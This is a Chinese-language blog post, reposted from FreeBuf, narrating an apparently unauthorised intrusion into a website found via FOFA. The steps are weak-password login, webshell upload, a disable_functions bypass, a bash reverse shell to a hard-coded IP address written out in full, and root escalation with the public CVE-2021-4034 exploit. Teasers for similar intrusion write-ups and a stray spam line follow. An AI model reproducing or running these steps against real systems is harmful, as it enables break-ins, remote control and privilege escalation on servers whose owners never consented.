<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    記一次滲透實戰

    VSole2022-07-09 06:54:19

    通過fofa搜索找到了一個登錄頁面

    通過一個弱口令進去了后臺是這樣的

    發現了文件上傳頁面,很簡單的前端過濾直接把冰蝎馬上傳,但是無法執行命令

    應該是開啟了disable_function,disable_functions是php.ini中的一個設置選項,可以用來設置PHP環境禁止使用某些函數,通常是網站管理員為了安全起見,用來禁用某些危險的命令執行函數等。(eval并非PHP函數,放在disable_functions中是無法禁用的,若要禁用需要用到PHP的擴展Suhosin。)

    看下禁用了哪些函數

    passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
    

    基本都禁了,百度了一番找到了一個腳本

    項目地址:https://github.com/mm0r1/exploits

    直接繞過了可以執行命令

    直接bash反彈

    bash+-i+>%26+/dev/tcp/112.74.50.219/7777+0>%261

    在frp反向代理到meterpreter

    查看內核

    這里使用了msf自帶的提權并沒有成功直接使用CVE-2021-4034 Polkit Pkexec本地提權

    復現EXP下載地址:https://github.com/berdav/CVE-2021-4034

    上傳編譯直接運行一開始沒有成功仔細看了下有個tmp目錄已經存在直接刪除在運行返回root權限。

    作者:一點我愛你110,轉載于FreeBuf.com
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    一次滲透實戰
    2022-07-09 06:54:19
    通過fofa搜索找到了一個登錄頁面通過一個弱口令進去了后臺是這樣的發現了文件上傳頁面,很簡單的前端過濾直接把冰蝎馬上傳,但是無法執行命令
    0x00前言接到任務,需要對一些違法網站做滲透測試……最終定位到該系統為某網絡驗證系統下載最新版的代碼到本地,開始審計。
    剛過完年的時候在XXX社區看到了這篇文章《一次滲透實戰-代碼審計到getshell》 通過搜索發現對應的是 冰心網絡驗證 http://wlyz.bingxs.com/ 于是嘗試在本地進行安裝進行審計 下載安裝包 https://teorun.lanzout.com/izfhn 下載安裝后,我們看到如果利用 phpstudy 設定域名,或者非 127.0.0.1 的 ip 地址時
    0x01 突破邊界拿下shell周末在家閑著沒事突然就想搞事情了,然后使用Google hack語法輸入批量搜索可能存在上傳點的網站,試了好幾個最后找到一個可利用的上傳點。反彈shell&提權Linux下需要把shell反彈出來以方便我們操作,但是目標主機上沒有nc也沒有python,查詢相關資料后嘗試了一下利用bash彈shell。在exploit-db中搜索此版本的相關漏洞,經過多次嘗試,發現了下面這個exp來提升權限。一鍵開啟遠程桌面,建立隱藏賬戶,成功連入遠程桌面。
    一次某集團滲透實戰
    不甘心,案例找不出來,我把代碼審計一遍還不行嗎?于是就通過webshell打包了一份代碼,于是便有了這篇文章。0x02 漏洞利用還是先簡單聊聊sql注入如何拿下內網的吧。因此可以下定結論,該漏洞在未經授權就可被利用。
    不甘心,案例找不出來,我把代碼審計一遍還不行嗎?于是就通過webshell打包了一份代碼,于是便有了這篇文章。0x02 漏洞利用還是先簡單聊聊sql注入如何拿下內網的吧。因此可以下定結論,該漏洞在未經授權就可被利用。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类